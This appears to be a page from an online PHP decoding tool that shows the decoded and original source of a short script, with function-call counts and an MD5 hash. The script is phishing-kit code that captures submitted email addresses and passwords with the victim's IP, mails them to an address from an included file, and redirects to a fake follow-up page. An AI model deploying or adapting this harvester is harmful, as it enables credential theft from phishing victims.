Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); $ip = getenv("REMOTE_ADDR"); $_SERVER = getenv("HTTP_USER_AGENT"..

Decoded Output download

<?php 
session_start(); 
$ip = getenv("REMOTE_ADDR"); 
$_SERVER = getenv("HTTP_USER_AGENT"); 
$msg = " 
-----------NEW Login-----------------> 
Email       :    ".$_POST['email']." 
Password    :  ".$_POST['password']." 
 
IP : $ip 
=================================="; 
 
include 'email.php'; 
$subj = "New fucking info dyal $ip"; 
$headers .= "Content-Type: text/plain; charset=UTF-8
"; 
$headers .= "Content-Transfer-Encoding: 8bit
"; 
mail("$to", $subj, $msg,"$headers"); 
 
header('location: information.php?sessionDataKey=5e6c0340-6287-488a-8dfc-93bf6d11141a&state=983a3692-1ef3-4f0a-84b6-ea44e907fce5'); 
?>

Did this file decode correctly?

Original Code

<?php
session_start();
$ip = getenv("REMOTE_ADDR");
$_SERVER = getenv("HTTP_USER_AGENT");
$msg = "
-----------NEW Login----------------->
Email       :    ".$_POST['email']."
Password    :  ".$_POST['password']."

IP : $ip
==================================";

include 'email.php';
$subj = "New fucking info dyal $ip";
$headers .= "Content-Type: text/plain; charset=UTF-8\n";
$headers .= "Content-Transfer-Encoding: 8bit\n";
mail("$to", $subj, $msg,"$headers");

header('location: information.php?sessionDataKey=5e6c0340-6287-488a-8dfc-93bf6d11141a&state=983a3692-1ef3-4f0a-84b6-ea44e907fce5');
?>

Function Calls

getenv 1
session_start 1

Variables

None

Stats

MD5 eeef942c3be58a342121bb5ad778fefb
Eval Count 0
Decode Time 81 ms